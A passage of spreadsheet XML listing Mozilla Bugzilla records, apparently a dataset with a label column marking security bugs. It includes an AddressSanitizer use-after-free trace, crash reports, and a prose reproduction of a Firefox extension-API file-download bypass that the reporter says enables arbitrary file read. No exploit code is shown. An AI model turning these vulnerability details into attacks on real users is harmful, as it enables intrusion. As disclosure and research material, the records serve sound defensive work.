    #12 0x7f37ab94c4b9 in JS::GCForReason(JSRuntime*, JS::gcreason::Reason) js/src/jsfriendapi.cpp:180
    #13 0x7f379dc5df7e in nsXPCComponents_Utils::ForceGC() js/xpconnect/src/XPCComponents.cpp:4106
    #14 0x7f37a4182f7b in NS_InvokeByIndex xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #15 0x7f379dea35af in CallMethodHelper::Invoke() js/xpconnect/src/XPCWrappedNative.cpp:2948
    #16 0x7f379dea35af in CallMethodHelper::Call() js/xpconnect/src/XPCWrappedNative.cpp:2282
    #17 0x7f379dea35af in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) js/xpconnect/src/XPCWrappedNative.cpp:2248
    #18 0x7f379defc7e1 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1486
    #19 0x7f37abc38ccf in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) js/src/jscntxtinlines.h:337
    #20 0x7f37abc38ccf in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/jsinterp.cpp:407
    #21 0x7f37abc121a0 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode, bool) js/src/jsinterp.cpp:2396
    #22 0x7f37abbbd64d in js::RunScript(JSContext*, js::StackFrame*) js/src/jsinterp.cpp:364
    #23 0x7f37abc39378 in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/jsinterp.cpp:421
    #24 0x7f37ab65a836 in js::Invoke(JSContext*, js::InvokeArgsGuard&amp;, js::MaybeConstruct) js/src/jsinterp.h:134
    #25 0x7f37abc3cdd0 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) js/src/jsinterp.cpp:454
    #26 0x7f37abf6b52d in js::DirectProxyHandler::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) js/src/jsproxy.cpp:481
    #27 0x7f37ac5ae772 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) js/src/jswrapper.cpp:453
    #28 0x7f37abfd499e in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) js/src/jsproxy.cpp:2613
    #29 0x7f37abff1e9a in proxy_Call(JSContext*, unsigned int, JS::Value*) js/src/jsproxy.cpp:3177
    #30 0x7f37abc385c2 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) js/src/jscntxtinlines.h:337
    #31 0x7f37abc385c2 in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/jsinterp.cpp:400
    #32 0x7f37abc121a0 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode, bool) js/src/jsinterp.cpp:2396
    #33 0x7f37abbbd64d in js::RunScript(JSContext*, js::StackFrame*) js/src/jsinterp.cpp:364
    #34 0x7f37abc4275b in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::AbstractFramePtr, JS::Value*) js/src/jsinterp.cpp:552
previously allocated by thread T0 here:
    #0 0x4184d2 in malloc
    #1 0x7f37b483f815 in moz_xmalloc memory/mozalloc/mozalloc.cpp:54
    #2 0x7f379a6e34ce in operator new(unsigned long) ../../../../dist/include/mozilla/mozalloc.h:201
    #3 0x7f379a6e34ce in nsGenericHTMLElement* mozilla::dom::NewHTMLElementHelper::Create&lt;nsHTMLVideoElement, mozilla::dom::HTMLVideoElement&gt;(already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::NewHTMLElementHelper::SFINAE&lt;bool (*)(nsIDocument*), mozilla::dom::HTMLVideoElement::InNavQuirksMode&gt;*) content/html/content/src/nsGenericHTMLElement.h:1855
    #4 0x7f379a6e32db in NS_NewHTMLVideoElement(already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::FromParser) content/html/content/src/HTMLVideoElement.cpp:36
    #5 0x7f379a7a8bb1 in CreateHTMLElement(unsigned int, already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::FromParser) content/html/document/src/nsHTMLContentSink.cpp:498
    #6 0x7f379a7a9375 in NS_NewHTMLElement(nsIContent**, already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::FromParser) content/html/document/src/nsHTMLContentSink.cpp:481
    #7 0x7f3798cbe79a in NS_NewElement(nsIContent**, already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::FromParser) content/base/src/nsNameSpaceManager.cpp:192
    #8 0x7f379c6d9ee0 in nsHtml5TreeOperation::Perform(nsHtml5TreeOpExecutor*, nsIContent**) parser/html/nsHtml5TreeOperation.cpp:349
    #9 0x7f379c6f89a5 in nsHtml5TreeOpExecutor::RunFlushLoop() parser/html/nsHtml5TreeOpExecutor.cpp:557
    #10 0x7f379c732fb2 in nsHtml5ExecutorFlusher::Run() parser/html/nsHtml5StreamParser.cpp:125
    #11 0x7f37a4061da7 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:627
    #12 0x7f37a3d0c532 in NS_ProcessNextEvent(nsIThread*, bool) objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:238
    #13 0x7f37a096c8a9 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:82
    #14 0x7f37a4378d1b in MessageLoop::RunInternal() ipc/chromium/src/base/message_loop.cc:219
    #15 0x7f37a4378b6e in MessageLoop::RunHandler() ipc/chromium/src/base/message_loop.cc:212
    #16 0x7f37a4378a59 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:186
    #17 0x7f379fd801ae in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:163
    #18 0x7f379ea6da40 in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:289
    #19 0x7f3794aadaeb in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:3878
    #20 0x7f3794ab31b0 in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:3945
    #21 0x7f3794ab5e75 in XRE_main toolkit/xre/nsAppRunner.cpp:4146
    #22 0x427c57 in do_main(int, char**, nsIFile*) browser/app/nsBrowserApp.cpp:271
    #23 0x424e11 in main browser/app/nsBrowserApp.cpp:576
    #24 0x7f37b6ac576c in
Shadow bytes around the buggy address:
  0x0c09800f17b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c09800f17c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c09800f17d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c09800f17e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c09800f17f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c09800f1800: fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c09800f1810: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c09800f1820: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c09800f1830: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
  0x0c09800f1840: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c09800f1850: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:     fa
  Heap righ redzone:     fb
  Freed Heap region:     fd
  Stack left redzone:    f1
  Stack mid redzone:     f2
  Stack right redzone:   f3
  Stack partial redzone: f4
  Stack after return:    f5
  Stack use after scope: f8
  Global redzone:        f9
  Global init order:     f6
  Poisoned by user:      f7
  ASan internal:         fe
==29697== ABORTING</t>
        </is>
      </c>
      <c r="X1884" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1885">
      <c r="A1885" t="n">
        <v>1231919</v>
      </c>
      <c r="B1885" t="inlineStr">
        <is>
          <t>2015-12-11 05:53:57 -0800</t>
        </is>
      </c>
      <c r="C1885" t="inlineStr">
        <is>
          <t>crash in mozilla::a11y::DocAccessible::ValidateARIAOwned</t>
        </is>
      </c>
      <c r="D1885" t="inlineStr">
        <is>
          <t>2016-09-22 17:19:41 -0700</t>
        </is>
      </c>
      <c r="E1885" t="n">
        <v>1</v>
      </c>
      <c r="F1885" t="n">
        <v>1</v>
      </c>
      <c r="G1885" t="n">
        <v>3</v>
      </c>
      <c r="H1885" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1885" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1885" t="inlineStr">
        <is>
          <t>Disability Access APIs</t>
        </is>
      </c>
      <c r="K1885" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1885" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1885" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N1885" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1885" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1885" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main46+][adv-esr45.1+]</t>
        </is>
      </c>
      <c r="Q1885" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1885" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1885" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T1885" t="n">
        <v>1</v>
      </c>
      <c r="U1885" t="n">
        <v>0</v>
      </c>
      <c r="V1885" t="n">
        <v>10</v>
      </c>
      <c r="W1885" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-1cee5aa5-a701-47f9-b19f-b134e2151210.
=============================================================
More here: https://crash-stats.mozilla.com/report/list?product=Firefox&amp;signature=mozilla%3A%3Aa11y%3A%3ADocAccessible%3A%3AValidateARIAOwned</t>
        </is>
      </c>
      <c r="X1885" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1886">
      <c r="A1886" t="n">
        <v>249250</v>
      </c>
      <c r="B1886" t="inlineStr">
        <is>
          <t>2004-06-30 09:55:08 -0700</t>
        </is>
      </c>
      <c r="C1886" t="inlineStr">
        <is>
          <t>Failure to launch with XML Parsing error</t>
        </is>
      </c>
      <c r="D1886" t="inlineStr">
        <is>
          <t>2004-07-02 11:35:06 -0700</t>
        </is>
      </c>
      <c r="E1886" t="n">
        <v>1</v>
      </c>
      <c r="F1886" t="n">
        <v>1</v>
      </c>
      <c r="G1886" t="n">
        <v>2</v>
      </c>
      <c r="H1886" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1886" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1886" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1886" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1886" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1886" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1886" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1886" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1886" t="inlineStr"/>
      <c r="Q1886" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1886" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1886" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1886" t="n">
        <v>1</v>
      </c>
      <c r="U1886" t="n">
        <v>0</v>
      </c>
      <c r="V1886" t="n">
        <v>11</v>
      </c>
      <c r="W1886" t="inlineStr">
        <is>
          <t>seen with windows installer build 2004-06-29-11-0.9
-Install the build using the FirefoxSetup.exe
on launch we get:
XML Parsing Error: undefined entity
Location: chrome://browser/content/broswer.xul
Line Number 19, Column 1:
note: the .zip version of this build launches without error.</t>
        </is>
      </c>
      <c r="X1886" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1887">
      <c r="A1887" t="n">
        <v>306701</v>
      </c>
      <c r="B1887" t="inlineStr">
        <is>
          <t>2005-09-01 07:39:40 -0700</t>
        </is>
      </c>
      <c r="C1887" t="inlineStr">
        <is>
          <t>calendar's default extension list needs quotes</t>
        </is>
      </c>
      <c r="D1887" t="inlineStr">
        <is>
          <t>2018-03-02 12:12:20 -0800</t>
        </is>
      </c>
      <c r="E1887" t="n">
        <v>1</v>
      </c>
      <c r="F1887" t="n">
        <v>1</v>
      </c>
      <c r="G1887" t="n">
        <v>7</v>
      </c>
      <c r="H1887" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1887" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J1887" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1887" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1887" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1887" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1887" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1887" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1887" t="inlineStr"/>
      <c r="Q1887" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1887" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1887" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T1887" t="n">
        <v>1</v>
      </c>
      <c r="U1887" t="n">
        <v>0</v>
      </c>
      <c r="V1887" t="n">
        <v>5</v>
      </c>
      <c r="W1887" t="inlineStr">
        <is>
          <t>bug 261489 added two extensions to sunbird's default extension list, making it
look like:
4126  MOZ_EXTENSIONS_DEFAULT=pref xmlextras transformiix 
The quotes are missing, leading to:
/home/chb/mozilla/configure: line 12669: xmlextras: command not found
and:
$ grep EXTEN autoconf.mk
MOZ_EXTENSIONS  =</t>
        </is>
      </c>
      <c r="X1887" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1888">
      <c r="A1888" t="n">
        <v>342739</v>
      </c>
      <c r="B1888" t="inlineStr">
        <is>
          <t>2006-06-26 07:00:13 -0700</t>
        </is>
      </c>
      <c r="C1888" t="inlineStr">
        <is>
          <t>Error: this.docShell has no properties in browser.xml when updating microsummary</t>
        </is>
      </c>
      <c r="D1888" t="inlineStr">
        <is>
          <t>2016-02-12 06:59:33 -0800</t>
        </is>
      </c>
      <c r="E1888" t="n">
        <v>1</v>
      </c>
      <c r="F1888" t="n">
        <v>1</v>
      </c>
      <c r="G1888" t="n">
        <v>6</v>
      </c>
      <c r="H1888" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1888" t="inlineStr">
        <is>
          <t>Firefox Graveyard</t>
        </is>
      </c>
      <c r="J1888" t="inlineStr">
        <is>
          <t>Microsummaries</t>
        </is>
      </c>
      <c r="K1888" t="inlineStr">
        <is>
          <t>2.0 Branch</t>
        </is>
      </c>
      <c r="L1888" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1888" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1888" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1888" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1888" t="inlineStr"/>
      <c r="Q1888" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1888" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1888" t="inlineStr">
        <is>
          <t>Firefox 2 beta1</t>
        </is>
      </c>
      <c r="T1888" t="n">
        <v>1</v>
      </c>
      <c r="U1888" t="n">
        <v>0</v>
      </c>
      <c r="V1888" t="n">
        <v>13</v>
      </c>
      <c r="W1888" t="inlineStr">
        <is>
          <t>Error: this.docShell has no properties
Source File: chrome://global/content/bindings/browser.xml
Line: 0
When I run a branch build with a microsummary, a livemark and a pref, my error console gets filled up with this message, while the processor shows abnormal activity.
Not sure if these are the right and only conditions, but with the attached profile I can reproduce it consistently.
- Run the latest branch build, using the attached profile
- The error console will show multiple identical errors.</t>
        </is>
      </c>
      <c r="X1888" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1889">
      <c r="A1889" t="n">
        <v>507429</v>
      </c>
      <c r="B1889" t="inlineStr">
        <is>
          <t>2009-07-30 11:00:55 -0700</t>
        </is>
      </c>
      <c r="C1889" t="inlineStr">
        <is>
          <t>Partial sync download support</t>
        </is>
      </c>
      <c r="D1889" t="inlineStr">
        <is>
          <t>2018-09-24 14:24:50 -0700</t>
        </is>
      </c>
      <c r="E1889" t="n">
        <v>1</v>
      </c>
      <c r="F1889" t="n">
        <v>1</v>
      </c>
      <c r="G1889" t="n">
        <v>2</v>
      </c>
      <c r="H1889" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1889" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1889" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K1889" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1889" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1889" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1889" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1889" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1889" t="inlineStr"/>
      <c r="Q1889" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1889" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1889" t="inlineStr">
        <is>
          <t>0.7</t>
        </is>
      </c>
      <c r="T1889" t="n">
        <v>1</v>
      </c>
      <c r="U1889" t="n">
        <v>0</v>
      </c>
      <c r="V1889" t="n">
        <v>6</v>
      </c>
      <c r="W1889" t="inlineStr">
        <is>
          <t>We should have the ability to download/upload data in chunks, instead of all at once.</t>
        </is>
      </c>
      <c r="X1889" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1890">
      <c r="A1890" t="n">
        <v>477337</v>
      </c>
      <c r="B1890" t="inlineStr">
        <is>
          <t>2009-02-06 16:44:36 -0800</t>
        </is>
      </c>
      <c r="C1890" t="inlineStr">
        <is>
          <t>Add Funnelcake (Feb '09) entries to bouncer</t>
        </is>
      </c>
      <c r="D1890" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1890" t="n">
        <v>1</v>
      </c>
      <c r="F1890" t="n">
        <v>1</v>
      </c>
      <c r="G1890" t="n">
        <v>5</v>
      </c>
      <c r="H1890" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1890" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1890" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1890" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1890" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1890" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1890" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1890" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1890" t="inlineStr"/>
      <c r="Q1890" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1890" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1890" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1890" t="n">
        <v>1</v>
      </c>
      <c r="U1890" t="n">
        <v>0</v>
      </c>
      <c r="V1890" t="n">
        <v>3</v>
      </c>
      <c r="W1890" t="inlineStr">
        <is>
          <t>This can be done in advance of pushing the pages at midnight (night of Monday,
2/16).</t>
        </is>
      </c>
      <c r="X1890" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1891">
      <c r="A1891" t="n">
        <v>1810793</v>
      </c>
      <c r="B1891" t="inlineStr">
        <is>
          <t>2023-01-17 09:07:05 -0800</t>
        </is>
      </c>
      <c r="C1891" t="inlineStr">
        <is>
          <t>FireFox Extension API : .url / .lnk / .local file download lead to Multiple issues</t>
        </is>
      </c>
      <c r="D1891" t="inlineStr">
        <is>
          <t>2024-05-30 11:04:12 -0700</t>
        </is>
      </c>
      <c r="E1891" t="n">
        <v>1</v>
      </c>
      <c r="F1891" t="n">
        <v>1</v>
      </c>
      <c r="G1891" t="n">
        <v>2</v>
      </c>
      <c r="H1891" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1891" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1891" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K1891" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1891" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1891" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1891" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1891" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1891" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main112+]</t>
        </is>
      </c>
      <c r="Q1891" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1891" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1891" t="inlineStr">
        <is>
          <t>112 Branch</t>
        </is>
      </c>
      <c r="T1891" t="n">
        <v>1</v>
      </c>
      <c r="U1891" t="n">
        <v>0</v>
      </c>
      <c r="V1891" t="n">
        <v>50</v>
      </c>
      <c r="W1891" t="inlineStr">
        <is>
          <t>Created attachment 9312642
manifest.json
Chromium Bug Reference: https://bugs.chromium.org/p/chromium/issues/detail?id=1307930
HI team i have already reported the same in another Place. Now i have found a alternate way to achieve the Same. Kindly have a look in to my below issue for POC Video.
Ref: https://bugzilla.mozilla.org/show_bug.cgi?id=1809923
While visiting a webpage if the download initiate for .lnk/ .local these file types are changed to .download by firefox. But i have found a way to download .lnk/.local/.url Files while lead to Arbitrary File Read etc.( based on file extension)
We can use browser.downloads.download API to download the .lnk/.local/.url file without changing it to .download
FIREFOX VERSION : 108.0.2 (64-bit)
REPRODUCTION CASE:
1. Add the Manifest File to the Extension in about:debugging#/runtime/this-firefox (keep backgroud.js file in same extension folder)
2. Once added Click on the extension
3. You can find the safe.url file is downloaded without renaming
Note: As stated in my previous issue the downloaded .url file can be used to achieve Arbitrary File Read
Same is possible for .lnk and .local too. tested</t>
        </is>
      </c>
      <c r="X1891" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1892">
      <c r="A1892" t="n">
        <v>903049</v>
      </c>
      <c r="B1892" t="inlineStr">
        <is>
          <t>2013-08-08 11:10:21 -0700</t>
        </is>
      </c>
      <c r="C1892" t="inlineStr">
        <is>
          <t>[Browser] Top Sites are Blurry</t>
        </is>
      </c>
      <c r="D1892" t="inlineStr">
        <is>
          <t>2013-08-27 04:19:23 -0700</t>
        </is>
      </c>
      <c r="E1892" t="n">
        <v>1</v>
      </c>
      <c r="F1892" t="n">
        <v>1</v>
      </c>
      <c r="G1892" t="n">
        <v>6</v>
      </c>
      <c r="H1892" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1892" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J1892" t="inlineStr">
        <is>
          <t>Gaia::Browser</t>
        </is>
      </c>
      <c r="K1892" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1892" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1892" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N1892" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1892" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1892" t="inlineStr">
        <is>
          <t>helix vsd [sprintready], HD</t>
        </is>
      </c>
      <c r="Q1892" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1892" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1892" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1892" t="n">
        <v>1</v>
      </c>
      <c r="U1892" t="n">
        <v>0</v>
      </c>
      <c r="V1892" t="n">
        <v>19</v>
      </c>
      <c r="W1892" t="inlineStr">
        <is>
          <t>The top sites on the starting browser page are blurry.  Is there anything that can be done to make them sharp?</t>
        </is>
      </c>
      <c r="X1892" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1893">
      <c r="A1893" t="n">
        <v>449006</v>
      </c>
      <c r="B1893" t="inlineStr">
        <is>
          <t>2008-08-04 00:45:12 -0700</t>
        </is>
      </c>
      <c r="C1893" t="inlineStr">
        <is>
          <t>[FIX] Crash [@ PlaceholderTxn::RedoTransaction] with redo, formatblock, DOMCharacterDataModified mutation listener</t>
        </is>
      </c>
      <c r="D1893" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E1893" t="n">
        <v>1</v>
      </c>
      <c r="F1893" t="n">
        <v>1</v>
      </c>
      <c r="G1893" t="n">
        <v>3</v>
      </c>
      <c r="H1893" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1893" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1893" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K1893" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1893" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1893" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1893" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1893" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1893" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1893" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1893" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1893" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1893" t="n">
        <v>1</v>
      </c>
      <c r="U1893" t="n">
        <v>0</v>
      </c>
      <c r="V1893" t="n">
        <v>18</v>
      </c>
      <c r="W1893" t="inlineStr">
        <is>
          <t>Created attachment 332179
testcase (crashes Firefox when loaded)
Loading the testcase makes PlaceholderTxn::RedoTransaction dereference a random address.  With MallocScribble and MallocPreScribble enabled, I've seen it dereference 0xaaaaaaaa, 0x55555555, and 0x0000000c.</t>
        </is>
      </c>
      <c r="X1893" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1894">
      <c r="A1894" t="n">
        <v>1452075</v>
      </c>
      <c r="B1894" t="inlineStr">
        <is>
          <t>2018-04-06 05:19:24 -0700</t>
        </is>
      </c>
      <c r="C1894" t="inlineStr">
        <is>
          <t>PDF Viewer will run code from PDF files, missing validation for /Domain and /Range parameters</t>
        </is>
      </c>
      <c r="D1894" t="inlineStr">
        <is>
          <t>2024-05-30 09:44:49 -0700</t>
        </is>
      </c>
      <c r="E1894" t="n">
        <v>1</v>
      </c>
      <c r="F1894" t="n">
        <v>1</v>
      </c>
      <c r="G1894" t="n">
        <v>2</v>
      </c>
      <c r="H1894" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1894" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1894" t="inlineStr">
        <is>
          <t>PDF Viewer</t>
        </is>
      </c>
      <c r="K1894" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1894" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1894" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1894" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1894" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1894" t="inlineStr">
        <is>
          <t>[adv-main60+][adv-esr52.8+]</t>
        </is>
      </c>
      <c r="Q1894" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1894" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
